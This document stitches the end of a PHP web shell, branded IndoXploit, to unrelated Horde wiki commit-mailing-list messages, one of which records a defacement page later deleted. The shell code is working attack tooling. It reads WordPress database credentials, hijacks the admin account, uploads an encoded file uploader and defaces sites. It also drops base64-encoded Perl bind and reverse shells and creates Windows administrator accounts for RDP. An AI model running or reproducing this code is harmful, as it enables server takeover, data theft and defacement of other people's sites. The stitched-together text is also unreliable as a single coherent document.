"; } else { if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) { echo "
-> adminer login <-
"; } else { echo "
gagal buat file adminer
"; } } } elseif($_GET['do'] == 'auto_dwp') { if($_POST['auto_deface_wp']) { function anucurl($sites) { $ch = curl_init($sites); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIESESSION, true); $data = curl_exec($ch); curl_close($ch); return $data; } function lohgin($cek, $web, $userr, $pass, $wp_submit) { $post = array( "log" => "$userr", "pwd" => "$pass", "rememberme" => "forever", "wp-submit" => "$wp_submit", "redirect_to" => "$web", "testcookie" => "1", ); $ch = curl_init($cek); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $post); curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIESESSION, true); $data = curl_exec($ch); curl_close($ch); return $data; } $scan = $_POST['link_config']; $link_config = scandir($scan); $script = htmlspecialchars($_POST['script']); $user = "indoxploit"; $pass = "indoxploit"; $passx = md5($pass); foreach($link_config as $dir_config) { if(!is_file("$scan/$dir_config")) continue; $config = file_get_contents("$scan/$dir_config"); if(preg_match("/WordPress/", $config)) { $dbhost = ambilkata($config,"DB_HOST', '","'"); $dbuser = ambilkata($config,"DB_USER', '","'"); $dbpass = ambilkata($config,"DB_PASSWORD', '","'"); $dbname = ambilkata($config,"DB_NAME', '","'"); $dbprefix = ambilkata($config,"table_prefix = '","'"); $prefix = $dbprefix."users"; $option = $dbprefix."options"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC"); $result = mysql_fetch_array($q); $id = $result[ID]; $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC"); $result2 = mysql_fetch_array($q2); $target = $result2[option_value]; if($target == '') { echo "[-] error, gabisa ambil nama domain nya
"; } else { echo "[+] $target
"; } $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'"); if(!$conn OR !$db OR !$update) { echo "[-] MySQL Error: ".mysql_error()."

"; mysql_close($conn); } else { $site = "$target/wp-login.php"; $site2 = "$target/wp-admin/theme-install.php?upload"; $b1 = anucurl($site2); $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />"); $b = lohgin($site, $site2, $user, $pass, $wp_sub); $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />"); $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg=="); $www = "m.php"; $fp5 = fopen($www,"w"); fputs($fp5,$upload3); $post2 = array( "_wpnonce" => "$anu2", "_wp_http_referer" => "/wp-admin/theme-install.php?upload", "themezip" => "@$www", "install-theme-submit" => "Install Now", ); $ch = curl_init("$target/wp-admin/update.php?action=upload-theme"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $post2); curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIESESSION, true); $data3 = curl_exec($ch); curl_close($ch); $y = date("Y"); $m = date("m"); $namafile = "id.php"; $fpi = fopen($namafile,"w"); fputs($fpi,$script); $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www"); curl_setopt($ch6, CURLOPT_POST, true); curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile")); curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt"); curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt'); curl_setopt($ch6, CURLOPT_COOKIESESSION, true); $postResult = curl_exec($ch6); curl_close($ch6); $as = "$target/k.php"; $bs = anucurl($as); if(preg_match("#$script#is", $bs)) { echo "[+] berhasil mepes...
"; echo "[+] $as

"; } else { echo "[-] gagal mepes...
"; echo "[!!] coba aja manual:
"; echo "[+] $target/wp-login.php
"; echo "[+] username: $user
"; echo "[+] password: $pass

"; } mysql_close($conn); } } } } else { echo "

WordPress Auto Deface




NB: Tools ini work jika dijalankan di dalam folder config ( ex: /home/user/public_html/nama_folder_config )
"; } } elseif($_GET['do'] == 'auto_dwp2') { if($_POST['auto_deface_wp']) { function anucurl($sites) { $ch = curl_init($sites); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIESESSION,true); $data = curl_exec($ch); curl_close($ch); return $data; } function lohgin($cek, $web, $userr, $pass, $wp_submit) { $post = array( "log" => "$userr", "pwd" => "$pass", "rememberme" => "forever", "wp-submit" => "$wp_submit", "redirect_to" => "$web", "testcookie" => "1", ); $ch = curl_init($cek); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $post); curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIESESSION, true); $data = curl_exec($ch); curl_close($ch); return $data; } $link = explode("\r\n", $_POST['link']); $script = htmlspecialchars($_POST['script']); $user = "indoxploit"; $pass = "indoxploit"; $passx = md5($pass); foreach($link as $dir_config) { $config = anucurl($dir_config); $dbhost = ambilkata($config,"DB_HOST', '","'"); $dbuser = ambilkata($config,"DB_USER', '","'"); $dbpass = ambilkata($config,"DB_PASSWORD', '","'"); $dbname = ambilkata($config,"DB_NAME', '","'"); $dbprefix = ambilkata($config,"table_prefix = '","'"); $prefix = $dbprefix."users"; $option = $dbprefix."options"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC"); $result = mysql_fetch_array($q); $id = $result[ID]; $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC"); $result2 = mysql_fetch_array($q2); $target = $result2[option_value]; if($target == '') { echo "[-] error, gabisa ambil nama domain nya
"; } else { echo "[+] $target
"; } $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'"); if(!$conn OR !$db OR !$update) { echo "[-] MySQL Error: ".mysql_error()."

"; mysql_close($conn); } else { $site = "$target/wp-login.php"; $site2 = "$target/wp-admin/theme-install.php?upload"; $b1 = anucurl($site2); $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />"); $b = lohgin($site, $site2, $user, $pass, $wp_sub); $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />"); $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg=="); $www = "m.php"; $fp5 = fopen($www,"w"); fputs($fp5,$upload3); $post2 = array( "_wpnonce" => "$anu2", "_wp_http_referer" => "/wp-admin/theme-install.php?upload", "themezip" => "@$www", "install-theme-submit" => "Install Now", ); $ch = curl_init("$target/wp-admin/update.php?action=upload-theme"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $post2); curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIESESSION, true); $data3 = curl_exec($ch); curl_close($ch); $y = date("Y"); $m = date("m"); $namafile = "id.php"; $fpi = fopen($namafile,"w"); fputs($fpi,$script); $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www"); curl_setopt($ch6, CURLOPT_POST, true); curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile")); curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt"); curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt'); curl_setopt($ch6, CURLOPT_COOKIESESSION,true); $postResult = curl_exec($ch6); curl_close($ch6); $as = "$target/k.php"; $bs = anucurl($as); if(preg_match("#$script#is", $bs)) { echo "[+] berhasil mepes...
"; echo "[+] $as

"; } else { echo "[-] gagal mepes...
"; echo "[!!] coba aja manual:
"; echo "[+] $target/wp-login.php
"; echo "[+] username: $user
"; echo "[+] password: $pass

"; } mysql_close($conn); } } } else { echo "

WordPress Auto Deface V.2

Link Config:


"; } } elseif($_GET['do'] == 'network') { echo "
Bind Port:
PORT:
Back Connect:
Server:    PORT:
"; $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0="; if(isset($_POST['sub_bp'])) { $f_bp = fopen("/tmp/bp.pl", "w"); fwrite($f_bp, base64_decode($bind_port_p)); fclose($f_bp); $port = $_POST['port_bind']; $out = exe("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &"); sleep(1); echo "
".$out."\n".exe("ps aux | grep bp.pl")."
"; unlink("/tmp/bp.pl"); } $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; if(isset($_POST['sub_bc'])) { $f_bc = fopen("/tmp/bc.pl", "w"); fwrite($f_bc, base64_decode($bind_connect_p)); fclose($f_bc); $ipbc = $_POST['ip_bc']; $port = $_POST['port_bc']; $out = exe("perl /tmp/bc.pl $ipbc $port 1>/dev/null 2>&1 &"); sleep(1); echo "
".$out."\n".exe("ps aux | grep bc.pl")."
"; unlink("/tmp/bc.pl"); } } elseif($_GET['do'] == 'krdp_shell') { if(strtolower(substr(PHP_OS, 0, 3)) === 'win') { if($_POST['create']) { $user = htmlspecialchars($_POST['user']); $pass = htmlspecialchars($_POST['pass']); if(preg_match("/$user/", exe("net user"))) { echo "[INFO] -> user $user sudah ada"; } else { $add_user = exe("net user $user $pass /add"); $add_groups1 = exe("net localgroup Administrators $user /add"); $add_groups2 = exe("net localgroup Administrator $user /add"); $add_groups3 = exe("net localgroup Administrateur $user /add"); echo "[ RDP ACCOUNT INFO ]
------------------------------
IP: ".$ip."
Username: $user
Password: $pass
------------------------------

[ STATUS ]
------------------------------
"; if($add_user) { echo "[add user] -> Berhasil
"; } else { echo "[add user] -> Gagal
"; } if($add_groups1) { echo "[add localgroup Administrators] -> Berhasil
"; } elseif($add_groups2) { echo "[add localgroup Administrator] -> Berhasil
"; } elseif($add_groups3) { echo "[add localgroup Administrateur] -> Berhasil
"; } else { echo "[add localgroup] -> Gagal
"; } echo "------------------------------
"; } } elseif($_POST['s_opsi']) { $user = htmlspecialchars($_POST['r_user']); if($_POST['opsi'] == '1') { $cek = exe("net user $user"); echo "Checking username $user ....... "; if(preg_match("/$user/", $cek)) { echo "[ Sudah ada ]
------------------------------

$cek
"; } else { echo "[ belum ada ]"; } } elseif($_POST['opsi'] == '2') { $cek = exe("net user $user indoxploit"); if(preg_match("/$user/", exe("net user"))) { echo "[change password: indoxploit] -> "; if($cek) { echo "Berhasil"; } else { echo "Gagal"; } } else { echo "[INFO] -> user $user belum ada"; } } elseif($_POST['opsi'] == '3') { $cek = exe("net user $user /DELETE"); if(preg_match("/$user/", exe("net user"))) { echo "[remove user: $user] -> "; if($cek) { echo "Berhasil"; } else { echo "Gagal"; } } else { echo "[INFO] -> user $user belum ada"; } } else { // } } else { echo "-- Create RDP --
-- Option --
"; } } else { echo "Fitur ini hanya dapat digunakan dalam Windows Server."; } } elseif($_GET['act'] == 'newfile') { if($_POST['new_save_file']) { $newfile = htmlspecialchars($_POST['newfile']); $fopen = fopen($newfile, "a+"); if($fopen) { $act = ""; } else { $act = "permission denied"; } } echo $act; echo "
Filename:
"; } elseif($_GET['act'] == 'newfolder') { if($_POST['new_save_folder']) { $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']); if(!mkdir($new_folder)) { $act = "permission denied"; } else { $act = ""; } } echo $act; echo "
Folder Name:
"; } elseif($_GET['act'] == 'rename_dir') { if($_POST['dir_rename']) { $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename']).""); if($dir_rename) { $act = ""; } else { $act = "permission denied"; } echo "".$act."
"; } echo "
"; } elseif($_GET['act'] == 'delete_dir') { if(is_dir($dir)) { if(is_writable($dir)) { @rmdir($dir); @exe("rm -rf $dir"); @exe("rmdir /s /q $dir"); $act = ""; } else { $act = "could not remove ".basename($dir).""; } } echo $act; } elseif($_GET['act'] == 'view') { echo "Filename: ".basename($_GET['file'])." [ view ] [ edit ] [ rename ] [ download ] [ delete ]
"; echo ""; } elseif($_GET['act'] == 'edit') { if($_POST['save']) { $save = file_put_contents($_GET['file'], $_POST['src']); if($save) { $act = "Saved!"; } else { $act = "permission denied"; } echo "".$act."
"; } echo "Filename: ".basename($_GET['file'])." [ view ] [ edit ] [ rename ] [ download ] [ delete ]
"; echo "

"; } elseif($_GET['act'] == 'rename') { if($_POST['do_rename']) { $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename']).""); if($rename) { $act = ""; } else { $act = "permission denied"; } echo "".$act."
"; } echo "Filename: ".basename($_GET['file'])." [ view ] [ edit ] [ rename ] [ download ] [ delete ]
"; echo "
"; } elseif($_GET['act'] == 'delete') { $delete = unlink($_GET['file']); if($delete) { $act = ""; } else { $act = "permission denied"; } echo $act; } else { if(is_dir($dir) === true) { if(!is_readable($dir)) { echo "can't open directory. ( not readable )"; } else { echo ''; $scandir = scandir($dir); foreach($scandir as $dirx) { $dtype = filetype("$dir/$dirx"); $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx")); if(function_exists('posix_getpwuid')) { $downer = @posix_getpwuid(fileowner("$dir/$dirx")); $downer = $downer['name']; } else { //$downer = $uid; $downer = fileowner("$dir/$dirx"); } if(function_exists('posix_getgrgid')) { $dgrp = @posix_getgrgid(filegroup("$dir/$dirx")); $dgrp = $dgrp['name']; } else { $dgrp = filegroup("$dir/$dirx"); } if(!is_dir("$dir/$dirx")) continue; if($dirx === '..') { $href = "$dirx"; } elseif($dirx === '.') { $href = "$dirx"; } else { $href = "$dirx"; } if($dirx === '.' || $dirx === '..') { $act_dir = "newfile | newfolder"; } else { $act_dir = "rename | delete"; } echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; } } } else { echo "can't open directory."; } foreach($scandir as $file) { $ftype = filetype("$dir/$file"); $ftime = date("F d Y g:i:s", filemtime("$dir/$file")); $size = filesize("$dir/$file")/1024; $size = round($size,3); if(function_exists('posix_getpwuid')) { $fowner = @posix_getpwuid(fileowner("$dir/$file")); $fowner = $fowner['name']; } else { //$downer = $uid; $fowner = fileowner("$dir/$file"); } if(function_exists('posix_getgrgid')) { $fgrp = @posix_getgrgid(filegroup("$dir/$file")); $fgrp = $fgrp['name']; } else { $fgrp = filegroup("$dir/$file"); } if($size > 1024) { $size = round($size/1024,2). 'MB'; } else { $size = $size. 'KB'; } if(!is_file("$dir/$file")) continue; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; } echo "
Name
Type
Size
Last Modified
Owner/Group
Permission
Action
$href
$dtype
-
$dtime
$downer/$dgrp
".w("$dir/$dirx",perms("$dir/$dirx"))."
$act_dir
$file
$ftype
$size
$ftime
$fowner/$fgrp
".w("$dir/$file",perms("$dir/$file"))."
edit | rename | delete | download
"; if(!is_readable($dir)) { // } else { echo "
"; } echo "
Copyright © ".date("Y")." - IndoXploit
"; } ?> From wikiguest at horde.org Sun Sep 3 14:10:39 2017 From: wikiguest at horde.org (Wiki Guest) Date: Sun, 03 Sep 2017 14:10:39 +0000 Subject: [commits] [Wiki] created: inurl:"admin/my_documents/my_files Message-ID: <20170903141039.Horde.TjlmCM5QYpGrEAM9Z2z-epp@wiki.horde.org> guest [95.159.83.109] Sun, 03 Sep 2017 14:10:39 +0000 Created page: https://wiki.horde.org/inurl%3A%22admin/my_documents/my_files HackEd BY LiaNtRoot HackEd By LiaNtRoOOt
HACKED BY LIANT_ROOT
From jan at horde.org Sun Sep 3 17:47:36 2017 From: jan at horde.org (Jan Schneider) Date: Sun, 03 Sep 2017 17:47:36 +0000 Subject: [commits] [Wiki] deleted: inurl:"admin/RTE_popup_file_atch.asp Message-ID: <20170903174736.Horde.yurWXCojqhNszL0rxzWuwEW@wiki.horde.org> jan Sun, 03 Sep 2017 17:47:36 +0000 Deleted page: inurl:"admin/RTE_popup_file_atch.asp From jan at horde.org Sun Sep 3 17:47:50 2017 From: jan at horde.org (Jan Schneider) Date: Sun, 03 Sep 2017 17:47:50 +0000 Subject: [commits] [Wiki] deleted: inurl:"admin/my_documents/my_files Message-ID: <20170903174750.Horde.L7zIxtX6cv1VqpWkEuAYdN7@wiki.horde.org> jan Sun, 03 Sep 2017 17:47:50 +0000 Deleted page: inurl:"admin/my_documents/my_files From jan at horde.org Sun Sep 3 17:47:58 2017 From: jan at horde.org (Jan Schneider) Date: Sun, 03 Sep 2017 17:47:58 +0000 Subject: [commits] [Wiki] deleted: Wiki/Home Message-ID: <20170903174758.Horde.ncRjFjR8-CQVlQT_j6EBgAk@wiki.horde.org> jan Sun, 03 Sep 2017 17:47:58 +0000 Deleted page: Wiki/Home From jan at horde.org Sun Sep 3 17:47:58 2017 From: jan at horde.org (Jan Schneider) Date: Sun, 03 Sep 2017 17:47:58 +0000 Subject: [commits] [Wiki] created: Wiki/Home Message-ID: <20170903174758.Horde.LbgL5H4e2Eci_jPO1MmYrNC@wiki.horde.org> jan Sun, 03 Sep 2017 17:47:58 +0000 Created page: https://wiki.horde.org/Wiki/Home + Welcome to the Wiki A Wiki is a site where everyone can collaborate on the content. The most well-known and widely used Wiki is the Wikipedia at http://www.wikipedia.org. You can read about ((Wiki/Usage)) and ((Wiki/AddingPages)). Currently this Wiki has no theme for discussion, so go ahead and play with it and have fun! From jan at horde.org Sun Sep 3 18:02:47 2017 From: jan at horde.org (Jan Schneider) Date: Sun, 03 Sep 2017 18:02:47 +0000 Subject: [commits] [Wiki] changed: Wiki/Home Message-ID: <20170903180247.Horde.LJApsdi7ZZEqhBGb7PUoVDA@wiki.horde.org> jan Sun, 03 Sep 2017 18:02:47 +0000 Modified page: https://wiki.horde.org/Wiki/Home New Revision: 2 Change log: Restore @@ -1,6 +1,21 @@ -+ Welcome to the Wiki ++ This is the Horde Wiki -A Wiki is a site where everyone can collaborate on the content. The most well-known and widely used Wiki is the Wikipedia at http://www.wikipedia.org. +||~ Horde Project Home Page: http://www.horde.org/ || -You can read about ((Wiki/Usage)) and ((Wiki/AddingPages)). Currently this Wiki has no theme for discussion, so go ahead and play with it and have fun! +++ Current Topics +* ((FAQ|Frequently Asked Questions - FAQ)) +* ((HowTo|Horde How Tos)) +* ((Doc|Documentation)) +* ((Project|Projects to add or change large or small pieces of Horde)) +* ((Installations|Deployments, Providers, Distributions, and Hardware requirements)) +* ((ReleaseManagement|Release Management)) +* ((SecurityManagement|Managing Security Issues)) +* ((InterestingLinks|Interesting Links for Horde Developers)) +* ((UserInterface|User interface documentation, improvements, conventions)) +* ((MediaPress|Media & Press: Horde in the mainstream)) + + +++ Older Topics + +* ((Horde3Development|Horde 3 Development Guidelines)) From jan at horde.org Wed Sep 6 08:16:46 2017 From: jan at horde.org (Jan Schneider) Date: Wed, 6 Sep 2017 10:16:46 +0200 (CEST) Subject: [commits] Horde branch master updated. 3c1556861e7cb7f86429a1807940b89d8cf0bdfb Message-ID: <20170906081845.14F5E100C73@spencer.horde.org> The branch "master" has been updated. The following is a summary of the commits. from: 7748bafdb9281b5c6ff2ec994614564fc48e3362 a57ed3f Standard project directories initialized by cvs2svn. 66233b6 initial add to PEAR 72faf53 somehow, an earlier version of Text_Wiki was added to PEAR CVS; this commit reflects the 0.14 version, which should have been imported in the first place. 50040f7 updated to reflect 0.15 release 528c3fa udpated with changes for 0.15: aebfc66 removed extra lines for nonexistent files 207a227 removed trim() from line 106 to leave leading and trailing white space in place in the output a740cc4 started new release, not sure if it will be 0.15.1 or 0.16. Noted "code" rule change about white space. fd9efd9 no longer need to smash list items together on sequential lines. you can have any number of blank newlines between list items and stay in the same list. this improves source readability. however, if you start a line with a non-* non-# character non-whitespace character, that counts as a new paragraph. 266f308 now can separate list items with newlines and you stay in the same list ef3f268 added extra newline to returned text so as not so screw up paragraphs a79cd6d fixed bug 1362, accented letters not translated to HTML entities. 44d77a1 fixed bug 1384, list rule inaccurate. Have implemented the "display: inline" style fix noted by Mike. Not really happy with this for the long term, but it will do for now. In future, will attempt to rewrite the "list" rule to be more semantically accurate. e81dfa1 process() returns two newlines after the table, not just one, to help with parsing paragraph breaks b1cf83d can now set rule conf key 'images' to turn image processing on and off (defaults to true/on) 9c41f41 added renderPlain() stub method ed2cf84 updated comments, brought package.xml up to 0.16, added renderPlain() methods, added newlines tailing deflist and table. updated comments. 2edb84b added getConf() method to safely access config key values c80dea5 added conf key 'numbers' (set to true if you want to allow numbers as lower-case letters in the regex). also added number-based regex as an alternate when 'numbers' is true. 433b024 added "'numbers' => false" in the wikilink conf array; it's false by default to maintain previous behavior. dbf1ff3 added newline before and after returned text to help with paragraph parsing 3996321 udpated with proper date 5ec01bf updated version number to 0.17 c38d93f removing files in preparation for MAJOR RESTRUCTURING of the directories 241808f Major restructuring of all Text_Wiki parsing and rendering rules is reflected by the addition of theses files. bc49952 updated Wiki.php to match the new directory structure 419d08f added date to the release f46447d moved and commented on the $_dirSep property 7c49065 fixed insertRule() so that it inserts properly when a second argument is passed 7ebbcc9 no changes in list.php updated package.xml to 0.19.1 c3d4bcc fixed bugs 1571 and 1573 c5d7885 updated to 0.19.2 d24f6ef fixed bug 1616 c3b7461 per note from Stephane Solliec, images now always render with an "alt" attribute 326dd89 image now accepts URLs in "link" attribute updated package.xml with same note 1409cf9 updated to 0.19.3 version number 4776595 apply htmlspecialchars() to $href, $target, and $text 102c728 apply htmlspecialchars() to $href and $text, apply urlencode() to $page e03b93b fixed bug 1628 3ae8479 * Fixed bug 1628 (encoding of URLs and freelinks) 049b057 updated to 0.19.4 with changes and date 4cad80c added "anchor" rule for parse and xhtml/render f6666d7 fixed bug 1722 (can't use two instances of Text_Wiki) 4b2c245 fixed bug 1709 (interwiki targets are invalid) a4cbe54 updated for 0.19.5 8794915 removed '#' scheme support for same-page anchor references, also added a ':' to the mailto scheme 82d971c updated to 0.19.6 ca5b316 for minimal XHTML compliance, the target attribute is left out by default (it used to be 'target="_blank"' by default, which is not XHTML 1.0 Strict compliant) 7b45892 updated version number, added change note about URL targets 168bd75 updated version number 57b6ec8 added renderer Plain for plain text cbe5125 added Plain renderers 6cd056f updated to 0.20 version number d8c9e32 updated with 0.20 release notes and files fb52314 changed to 0.20.0 (three numbers not two) d498fe9 removed bad copies of Xhtml and Plain dirs, will replace 05ef3d0 added Plain renderer files 70829bc re-added Xhtml renderer files e826194 updated with 0.20.1 release notes bbd6e3e for deflist, must now use ": " (colon-space) at beginning and " : " (space-colon-space) to separate term from def; this it becuase URLs as terms were breaking the rule 9af387d applied fix for bug 2095, CSS not honored in deflist rule (thanks for the patch, glamm at a-s-i dot com) a8a19b4 updated release date 4cf0215 updated version number fbfb2a6 added comment to credit contribution from Stephane le Solliec 73b32f5 URL "target"s are now XHTML compliant with suggestion from Aaron Kalin and JS code from youngpup.net 322511c add 'id' attrbute to token; this will let us generate better tables of contents 22614aa added id_prefix conf element e39f1ce continued working with new Heading and Toc rules for better, faster tables of contents (XHTML-compliant "div" support) 5781d16 changed version number in Wiki.php, continued tweaking Toc rendering and parameters d6aea1d now guesses width and height, and adds a pseudo-center alignment option (thanks Stephane Solliec) aa7c2d2 added formatConf() method to wrap a config value in an sprintf() format string (thanks Bob Glamm) 1f7ca2c added 'css' conf key (thanks Bob Glamm) ce033f4 * Base Render class now has formatConf() method to wrap a config value in an 